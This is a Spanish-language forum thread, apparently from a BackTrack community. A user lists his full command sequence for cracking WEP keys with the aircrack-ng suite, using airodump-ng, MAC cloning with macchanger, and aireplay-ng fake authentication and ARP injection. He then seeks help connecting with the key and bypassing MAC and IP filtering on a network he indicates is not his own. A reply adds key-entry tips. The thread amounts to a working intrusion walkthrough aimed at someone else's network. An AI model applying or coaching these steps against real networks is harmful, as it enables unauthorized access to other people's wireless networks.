Resultados 1 al 3 de 3

Tema: problemas de coneccion con backtrack 5r2

Recien Nacido
    Gracias
    0
    Agradecido 0 veces en 0 Mensajes

Post problemas de coneccion con backtrack 5r2

hola a todos soy nuevo en ento de auditorias de wirelles, antes de comensar decirles que tienen una magnifica comunidad de este SO en especial backtrack , y disculparme si en algun momento cometo errores de ortografia, o desconocimineto de algun tema , espero sean pacientes : bueno al tema que deseo que me aclaren jeje.

lo que siucede esque hace unos dias atras e leido un manual de la revista hackxtrack sobre crackin wirreles desde cero, y me fascino muchisimo y comence a indagar un pooco mas en el tema , y aprendi hasta el punto de sacar contraceñas tanto de tipo : wep .wpa y wpa2 , bueno el tema biene aqui a la hora de obtener la contraceña e introducirla en el network manager que trae por defecto backtrack 5r2 32 bits . y configurarlo introdusco la clave por ejemplo (313161622b) le coloco tipo de encriptacion wep y algo que dice numeros y letras numeros del 0-9 creo y letras de la a a la -f o g no recuerdo bien en estos monetos bueno lo que pasa es que me bota bad passwor o si no accespoint no auntentificado, e investigado un poco y estoy seguro que tiene filtrado mac , ya que en windows 7 si logro conectarme con la misma password y solo tengo que cambiarle la mac y todo ok , pero en backtrack no logro esto ; los pasos que sigo para obtener la clave y tratar de asscociarme al accespoint son:

airmon-ng para ver los dispositivos en mi caso es un rtl8187l y un atheros . pero el dispositivo que utilizo es el realtek 8187l

lugo al wer que este dsipositivo esta en la interface wlan1... ete es el rtl8187l y wlan0 el atheros.
    bueno luego.
    airodump-ng wlan1 ................. para ver las redes que hay . logro captar varios tipos de redes wep,wpa,wpa2 y opn,

bueno una ves identificado el bssid de la red , el ssid , el canal , y la estacion "las macs de los clientes conectados " crtl+c para deteneer

luego
    airmon-ng stop wlan1 para detenerlo
    luego
    ifconfig wlan1 down
    macchanger -m estacion de x cliente wlan1 ---- con esto cambio la mac por la de un x cliente conectado a la red que deseo colgarme, y creo que con esto tambien puedo salrarme el filtrado mac

airmon-ng start wlan1 para activar el dispositivo.

luego
    airodump-ng wlan1
    una vees vuelto a identificar la red y el canal
    airodump-ng -c canal --bssid "de esta red" -w "nombre cualquier para guardar el numero de paquetes-llamaremos - redx" wlan1
    luego
    aireplay-ng -1 0 -a "bssid de la red a auditoriar" -h "la estacion que clonamos" -e "el ssid de la red" wlan1
    luego que se asocia a eta red
    aireplay-ng -3 -b "bssid de la red a auditoriar" -h "la estacion que clonamos" wlan1
    con esto inyecto paquetes
    una ves capturados x cantidad de paquetes .
    aireplay-ng redx*.cap
    clave obtenida
    y luego airmon-ng stop wlan1 ... xq si abro el network manager no me detecta redes .
    tengo que hacer esto para que me detecte las redes
    ingreso la clave en opciones de la red .
    y luego .. bad password o si no accsespoint noasociate

diganme si cometo algun problema para conectarme , o que debo hacer sacar la clave ya esta pero para ingresar es el problema espero me puedan ayudar amigo, les agradeceria ya que windows es un so de melas pero entro a internet , pero con so que me encanta no puedo mucho. ayuenme se los agradeceria ..

atte: redscorpion

aotra cosita , a un amigo que tiene su red , tiene filtrado mac y creo que ip , pero ojo esta red no es a la que me quiero colgar , la que deseo es otra red la cual solo tiene filtrado mac

Recien Nacido
    Gracias
    5

Predeterminado

a ver compañero: no se si te entiendo, ya conseguiste la contraseña que buscabas? en el caso de que ya tengas la contraseña, debes saber que tipo de cifrado es, introducir la clave segun el tipo de cifrado por ejemplo: si la contraseña es : 10589736 debes introducirla en la opción que te dice HEX [ 0/9-A/F], si por el contrario la contraseña es reds"!coprpion debe ir en Passphrase ( OJO todo esto si es una red con cifrado WEP) eso en cuanto al problema de bad password.
    cuando ejecutas el comando (airmon-ng start wlan1) debe crearse la interfaz mon0 que es la que debe quedar en modo monitor y esa es la que debes utilizar preferiblemente.

Recien Nacido
    Gracias
    0

Predeterminado

hola amigo "arpia" este comando wlan1 me bota este modo mon0 o haveces mon1 eso dependiendo de cuantas veces detenga e inicie el dispositivo en este caso wlan1, bueno la contraceña es hex [1-9a/f] la claves es correcta , y todo eso pero en la parte donde es de introducir la contraceña en la parte superior de esta hay una serie de opciones , como ip netmask ..otra que no recuerdo y debajo de estas hay aun mas opciones como.

DNS donaim
    dns search
    dns1
    dns2
    dn3
    bueno eso lo configuro asi
    192.168.1.100
    225.225.225.0
    192.168.1.1

dns donain no se que poner
    dns search tampoco....
    dns1 . 200.48.225.130
    dn2 200.48.225.146
    clave y listo .

esto es claro en el wick network manager , en la parte de propiedades de la red a la que uno se desea conectar . y luego le doy a conect . y sale est
    bad password
    o
    accespoint no asociated
    mi pregunta es , se que esta maquina tiene filtrado mac
    pero lei que para saltarse este filtrado solo hay que consegir una station que son las mac de los clientes conectados a esta red ... verdad
    ya la consigo y cambio mi mac por esta
    pero el problema esta en que no se si estare bien
    como yo me asocio
    aireplay-ng -1 0 -a bssid de la red -h mac fake -e "ssid" mon0 o 1 o 2 depende del caso
    pero aun asi nada , pero hay veces que si da , pero sin acceso a internet , lo que me da mas colera es que el el pinche windows 7 solo le cambio la mac y ya esta entra sin mas problemas . no se si usted podria hacer un video de como saltarse este filtrado mac , porqe e probado varias formasy aun asi me siga dando resultados negativos , a y otra cosita , no se si tambien sepa algo de filtrado ip es porque hay otra red la cual creo que tiene este tipo de filtrado mac e ip

de antemano gracias

Visitantes encuentran esta página buscando por:

por que me bota el backtrack

backtrack foro de problemas

porque me sale bad pasword en baktrack al poner la clave wifi wep si es la corrrecta

todo sobre backtrack 5r2 y su utilizacion

tengo la clave pero me sale bad password

que contrasena trae por defecto bactra

backtrack no se conecta a internet me dice bad password

saltar filtrado mac con backtrack 5

no puedo conectar a la red wifi con clave obtenida con backtrack

que pasa si backtrack no se asocia con la red con aireplay-ng

donde pongo los dns filtrados del backtrack 5

conectarse a una red mac fake inalambrica backtrack

Bad Password BackTrack 5

tengo problemas al encontrar la station de mi red usando backtrack

filtrado mac backtrack